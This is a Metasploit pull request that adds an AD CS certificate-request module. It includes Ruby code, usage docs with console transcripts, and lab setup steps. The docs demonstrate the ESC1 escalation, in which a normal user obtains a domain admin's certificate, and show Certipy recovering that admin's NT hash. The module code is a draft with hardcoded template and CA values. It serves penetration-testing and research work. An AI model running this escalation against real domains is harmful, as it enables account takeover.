### PR TITLE
Add module for issuing certificates

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -75,7 +75,7 @@ PATH
       rex-text
       rex-zip
       ruby-macho
-      ruby_smb (~> 3.1.0)
+      ruby_smb (~> 3.2.0)
       rubyntlm
       rubyzip
       sinatra
@@ -429,7 +429,7 @@ GEM
     ruby-progressbar (1.11.0)
     ruby-rc4 (0.1.5)
     ruby2_keywords (0.0.5)
-    ruby_smb (3.1.7)
+    ruby_smb (3.2.0)
       bindata
       openssl-ccm
       openssl-cmac

--- a/documentation/modules/auxiliary/admin/dcerpc/icpr_cert.md
+++ b/documentation/modules/auxiliary/admin/dcerpc/icpr_cert.md
@@ -1,0 +1,139 @@
+## Vulnerable Application
+Request certificates via MS-ICPR (Active Directory Certificate Services). Depending on the certificate
+template's configuration the resulting certificate can be used for various operations such as authentication.
+PFX certificate files that are saved are encrypted with a blank password.
+
+## Verification Steps
+
+1. From msfconsole
+2. Do: `use auxiliary/admin/dcerpc/icpr_cert`
+3. Set the `CA`, `RHOSTS`, `SMBUser` and `SMBPass` options
+4. Run the module and see that a new certificate was issued or submitted
+
+## Options
+
+### CA
+The target certificate authority. The default value used by AD CS is `$domain-DC-CA`.
+
+### CERT_TEMPLATE
+The certificate template to issue, e.g. "User".
+
+### ALT_DNS
+Alternative DNS name to specify in the certificate. Useful in certain attack scenarios.
+
+### ALT_UPN
+Alternative User Principal Name (UPN) to specify in the certificate. Useful in certain attack scenarios. This is in the
+format `$username@$dnsDomainName`.
+
+## Actions
+
+### REQUEST_CERT
+Request a certificate. The certificate PFX file will be stored on success. The certificate file's password is blank.
+
+## Scenarios
+
+### Obtaining Configuration Values
+For this module to work, it's necessary to know the name of a CA and certificate template. These values can be obtained
+by a normal user via LDAP.
+
+```
+msf6 > use auxiliary/gather/ldap_query 
+msf6 auxiliary(gather/ldap_query) > set BIND_DN aliddle@msflab.local
+BIND_DN => aliddle@msflab.local
+msf6 auxiliary(gather/ldap_query) > set BIND_PW Password1!
+BIND_PW => Password1!
+msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_ADCS_CAS 
+ACTION => ENUM_ADCS_CAS
+msf6 auxiliary(gather/ldap_query) > run
+[*] Running module against 192.168.159.10
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
+CN=msflab-DC-CA CN=Enrollment Services CN=Public Key Services CN=Services CN=Configuration DC=msflab DC=local
+=============================================================================================================
+
+ Name                  Attributes
+ ----                  ----------
+ cacertificatedn       CN=msflab-DC-CA, DC=msflab, DC=local
+ certificatetemplates  ESC1-Test || Workstation || ClientAuth || DirectoryEmailReplication || DomainControllerAuthentication || KerberosAuthentication || EFSRecovery || EFS || DomainController || WebServer || Machine || User || SubCA |
+                       | Administrator
+ cn                    msflab-DC-CA
+ dnshostname           DC.msflab.local
+ name                  msflab-DC-CA
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_query) >
+```
+
+### Issue A Generic Certificate
+In this scenario, an authenticated user issues a certificate for themselves using the `User` template which is available
+by default. The user must know the CA name, which in this case is `msflab-DC-CA`.
+
+```
+msf6 > use auxiliary/admin/dcerpc/icpr_cert 
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass Password1!
+SMBPass => Password1!
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA msflab-DC-CA
+CA => msflab-DC-CA
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE User
+CERT_TEMPLATE => User
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 192.168.159.10
+
+[*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
+[*] 192.168.159.10:445 - Binding to \cert...
+[+] 192.168.159.10:445 - Bound to \cert
+[*] 192.168.159.10:445 - Requesting a certificate...
+[+] 192.168.159.10:445 - The requested certificate was issued.
+[*] 192.168.159.10:445 - Certificate UPN: aliddle@msflab.local
+[*] 192.168.159.10:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1106
+[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20220824125053_default_unknown_windows.ad.cs_545696.pfx
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/icpr_cert) >
+```
+
+### Issue A Certificate With A Specific subjectAltName (AKA ESC1)
+In this scenario, an authenticated user exploits a misconfiguration allowing them to issue a certificate for a different
+User Principal Name (UPN), typically one that is an administrator. Exploiting this misconfiguration to specify a
+different UPN effectively issues a certificate that can be used to authenticate as another user.
+
+The user must know:
+
+* A vulnerable certificate template, in this case `ESC1-Test`.
+* The UPN of a target account, in this case `smcintyre@msflab.local`.
+
+See [Certified Pre-Owned](https://posts.specterops.io/certified-pre-owned-d95910965cd2) section on ESC1 for more
+information.
+
+```
+msf6 > use auxiliary/admin/dcerpc/icpr_cert 
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass Password1!
+SMBPass => Password1!
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA msflab-DC-CA
+CA => msflab-DC-CA
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC1-Test
+CERT_TEMPLATE => ESC1-Test
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_UPN smcintyre@msflab.local
+ALT_UPN => smcintyre@msflab.local
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 192.168.159.10
+
+[*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
+[*] 192.168.159.10:445 - Binding to \cert...
+[+] 192.168.159.10:445 - Bound to \cert
+[*] 192.168.159.10:445 - Requesting a certificate...
+[+] 192.168.159.10:445 - The requested certificate was issued.
+[*] 192.168.159.10:445 - Certificate UPN: smcintyre@msflab.local
+[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20220824125859_default_unknown_windows.ad.cs_829589.pfx
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/icpr_cert) >
+```

--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -140,7 +140,7 @@ Gem::Specification.new do |spec|
   spec.add_runtime_dependency 'net-ssh'
   spec.add_runtime_dependency 'ed25519' # Adds ed25519 keys for net-ssh
   spec.add_runtime_dependency 'bcrypt_pbkdf'
-  spec.add_runtime_dependency 'ruby_smb', '~> 3.1.0'
+  spec.add_runtime_dependency 'ruby_smb', '~> 3.2.0'
   spec.add_runtime_dependency 'net-ldap'
   spec.add_runtime_dependency 'net-smtp'
   spec.add_runtime_dependency 'winrm'

--- a/modules/auxiliary/admin/dcerpc/icpr_cert.rb
+++ b/modules/auxiliary/admin/dcerpc/icpr_cert.rb
@@ -1,0 +1,201 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'ruby_smb/dcerpc/client'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::SMB::Client::Authenticated
+  include Msf::Exploit::Remote::DCERPC
+  include Msf::Auxiliary::Report
+
+  NTDS_CA_SECURITY_EXT = '1.3.6.1.4.1.311.25.2'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ICPR Cert Management',
+        'Description' => %q{
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          # todo: Original certipy code
+          'Spencer McIntyre',
+        ],
+        'References' => [
+        ],
+        'Notes' => {
+          'Reliability' => [],
+          'Stability' => [],
+          'SideEffects' => [ IOC_IN_LOGS ]
+        },
+        'Actions' => [
+          [ 'REQUEST_CERT', { 'Description' => 'Request a certificate' } ]
+        ],
+        'DefaultAction' => 'REQUEST_CERT'
+      )
+    )
+
+    register_options([
+      Opt::RPORT(445)
+    ])
+  end
+
+  def connect_icpr
+    vprint_status('Connecting to ICertPassage (ICPR) Remote Protocol')
+    #icpr = @tree.open_file(filename: 'cert', write: true, read: true)
+    icpr = RubySMB::Dcerpc::Client.new(
+      rhost,
+      RubySMB::Dcerpc::Icpr,
+      username: datastore['SMBUser'],
+      password: datastore['SMBPass']
+    )
+    icpr.connect
+
+    vprint_status('Binding to \\cert...')
+    icpr.bind(
+      endpoint: RubySMB::Dcerpc::Icpr,
+      auth_level: RubySMB::Dcerpc::RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
+      auth_type: RubySMB::Dcerpc::RPC_C_AUTHN_WINNT
+    )
+    vprint_good('Bound to \\cert')
+
+    icpr
+  end
+
+  def run
+    # begin
+    #   connect
+    # rescue Rex::ConnectionError => e
+    #   fail_with(Failure::Unreachable, e.message)
+    # end
+    #
+    # begin
+    #   smb_login
+    # rescue Rex::Proto::SMB::Exceptions::Error, RubySMB::Error::RubySMBError => e
+    #   fail_with(Failure::NoAccess, "Unable to authenticate ([#{e.class}] #{e}).")
+    # end
+    # report_service(
+    #   host: rhost,
+    #   port: rport,
+    #   host_name: simple.client.default_name,
+    #   proto: 'tcp',
+    #   name: 'smb',
+    #   info: "Module: #{fullname}, last negotiated version: SMBv#{simple.client.negotiated_smb_version} (dialect = #{simple.client.dialect})"
+    # )
+    #
+    # begin
+    #   @tree = simple.client.tree_connect("\\\\#{sock.peerhost}\\IPC$")
+    # rescue RubySMB::Error::RubySMBError => e
+    #   fail_with(Failure::Unreachable, "Unable to connect to the remote IPC$ share ([#{e.class}] #{e}).")
+    # end
+
+    begin
+      @icpr = connect_icpr
+    rescue RubySMB::Error::UnexpectedStatusCode => e
+      if e.status_code == ::WindowsError::NTStatus::STATUS_OBJECT_NAME_NOT_FOUND
+        # STATUS_OBJECT_NAME_NOT_FOUND will be the status if Active Directory Certificate Service (AD CS) is not installed on the target
+        fail_with(Failure::NotFound, 'Connection failed (AD CS was not found)')
+      end
+
+      elog(e.message, error: e)
+      fail_with(Failure::UnexpectedReply, "Connection failed (unexpected status: #{e.status_name})")
+    end
+
+    send("action_#{action.name.downcase}")
+  rescue RubySMB::Dcerpc::Error::FaultError => e
+    elog(e.message, error: e)
+    fail_with(Failure::UnexpectedReply, "Operation failed (DCERPC fault: #{e.status_name})")
+  rescue RubySMB::Dcerpc::Error::DcerpcError => e
+    elog(e.message, error: e)
+    fail_with(Failure::UnexpectedReply, e.message)
+  rescue RubySMB::Error::RubySMBError
+    elog(e.message, error: e)
+    fail_with(Failure::Unknown, e.message)
+  end
+
+  def action_request_cert
+    private_key = OpenSSL::PKey::RSA.new(2048)
+    csr = make_csr(cn: 'smcintyre', private_key: private_key)
+
+    print_status('Requesting a certificate...')
+    response = @icpr.cert_server_request(
+      attributes: { 'CertificateTemplate' => 'User' },
+      authority: 'msflab-DC-CA',
+      csr: csr
+    )
+    case response[:status]
+    when :issued
+      print_good('The requested certificate was issued.')
+    when :submitted
+      print_warning('The requested certificate was submitted for review.')
+    else
+      print_error('There was an error while requesting the certificate.')
+      return
+    end
+
+    if (upn = get_cert_upn(response[:certificate]))
+      print_status("Certificate UPN: #{upn}")
+    end
+
+    if (sid = get_cert_sid(response[:certificate]))
+      print_status("Certificate SID: #{sid}")
+    end
+
+    pkcs12 = OpenSSL::PKCS12.create(
+      '',
+      '',
+      private_key,
+      response[:certificate]
+    )
+    # see: https://pki-tutorial.readthedocs.io/en/latest/mime.html#mime-types
+    stored_path = store_loot('certificate.pfx', 'application/x-pkcs12', nil, pkcs12.to_der, 'certificate.pfx', 'Certificate')
+    print_status("Certificate stored at: #{stored_path}")
+  end
+
+  def make_csr(cn:, private_key:)
+    request = OpenSSL::X509::Request.new
+    request.version = 1
+    request.subject = OpenSSL::X509::Name.new([
+      ['CN', cn,  OpenSSL::ASN1::UTF8STRING]
+    ])
+    request.public_key = private_key.public_key
+    request.sign(private_key, OpenSSL::Digest::SHA256.new)
+    request
+  end
+
+  def get_cert_sid(cert)
+    ext = cert.find_extension(NTDS_CA_SECURITY_EXT)
+    return unless ext
+
+    ext_asn = OpenSSL::ASN1.decode(OpenSSL::ASN1.decode(ext.to_der).value[1].value)
+    ext_asn.value.each do |value|
+      value = value.value
+      next unless value.is_a?(Array)
+      next unless value[0].value == '1.3.6.1.4.1.311.25.2.1'
+
+      return value[1].value[0].value
+    end
+
+    nil
+  end
+
+  def get_cert_upn(cert)
+    ext = cert.find_extension('subjectAltName')
+    return unless ext
+
+    # need to decode the contents and handle them ourselves
+    ext_asn = OpenSSL::ASN1.decode(OpenSSL::ASN1.decode(ext.to_der).value[1].value)
+    ext_asn.value.each do |value|
+      value = value.value
+      next unless value.is_a?(Array)
+      next unless value[0].value == 'msUPN'
+
+      return value[1].value[0].value
+    end
+
+    nil
+  end
+end


### PR DESCRIPTION
This adds a module for issuing certificates via Active Directory Certificate Services. Issuing certificates is useful in a few contexts including persistence, [ESC1](https://posts.specterops.io/certified-pre-owned-d95910965cd2) and as a primitive necessary for exploiting [CVE-2022-26923](https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html) (coming soon). The resulting PFX certificate file is stored to loot and is encrypted using a blank password. It doesn't look like Ruby supports writing PFX files without encryption, and specifying a password would break compatibility with other tools.

Requires rapid7/ruby_smb#236 to be landed first for the necessary DCERPC definitions and functionality.

This is not blocked by #16938, but the documentation does refer to the queries that are added in there as part of the workflow, so it is related. Without that functionality, the user will just need to know the `CA` and `CERT_TEMPLATE` names. Either you'd know them because you set them up in Active Directory, or you'd have obtained them through another tool like Certipy's `find` command.

## Verification

- [ ] Install ADCS on either a new or existing domain controller
    - [ ] Open the Server Manager
    - [ ] Select Add roles and features
    - [ ] Select "Active Directory Certificate Services" under the "Server Roles" section
    - [ ] When prompted add all of the features and management tools
    - [ ] On the AD CS "Role Services" tab, leave the default selection of only "Certificate Authority"
    - [ ] Completion the installation and reboot the server
    - [ ] Reopen the Server Manager
    - [ ] Go to the AD CS tab and where it says "Configuration Required", hit "More" then "Configure Active Directory Certificate..."
    - [ ] Select "Certificate Authority" in the Role Services tab
    - [ ] Keep all of the default settings, noting the value of the "Common name for this CA" on the "CA Name" tab (this value corresponds to the `CA` datastore option)
    - [ ] Accept the rest of the default settings and complete the configuration
- [ ] Configure a certificate template to be vulnerable via ESC1
    - [ ] Run `certtmpl.msc`
    - [ ] Find the default "User" template, right-click it to duplicate it
    - [ ] In the "General" tab, rename the template to `ESC1-Test`
    - [ ] In the "Subject Name" tab, select "Supply in the request", ignore the warning that pops up
    - [ ] Hit OK to create the new template
    - [ ] Run `certsrv.msc`
    - [ ] Navigate to "Certification Authority (local)" > DC-CA > "Certificate Templates" then right click, and select New > "Certificate Template to Issue"
    - [ ] Select ESC1-Test
- [ ] Test the module (for all of these steps, authenticate as a normal domain user)
- [ ] Use the module
- [ ] Set the `CA`, `RHOSTS`, `SMBUser`, and `SMBPass` options correctly
- [ ] Issue a normal certificate using the default "User` certificate template (`set CERT_TEMPLATE User`)
    - [ ] Test that this certificate allows you to authenticate as the normal user
 - [ ] Set the `ALT_UPN` to a domain administrator, like `smcintyre@msflab.local` where `smcintyre` is the domain admin and `msflab.local` is the DNS domain name
 - [ ] Set the `CERT_TEMPLATE` option to `ESC1-Test` and run the module
     - [ ] Test that this certificate allows you to authenticate as the domain admin 

### PFX Certificate Validation
Regardless of how the certificate is obtained, the easiest way to validate that it is correct is to use [Certipy](https://github.com/ly4k/Certipy)'s `auth` sub command. The certificate stored in loot by Metasploit should be able to be used to authenticate to the domain controller.

Example showing that a certificate is working, and the hash for user MSFLAB\smcintyre is recovered.
```
python -m certipy.entry auth -pfx /home/smcintyre/.msf4/loot/20220824125859_default_unknown_windows.ad.cs_829589.pfx -dc-ip 192.168.159.10
Cannot determine Certipy version. If running from source you should at least run "python setup.py egg_info"
Certipy v? - by Oliver Lyak (ly4k)

[*] Using principal: smcintyre@msflab.loca-
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'smcintyre.ccache'
[*] Trying to retrieve NT hash for 'smcintyre'
[*] Got hash for 'smcintyre@msflab.local': aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f
```

Metasploit can't perform this step natively yet because there's no support for the PKINIT extension when authenticating with Kerberos.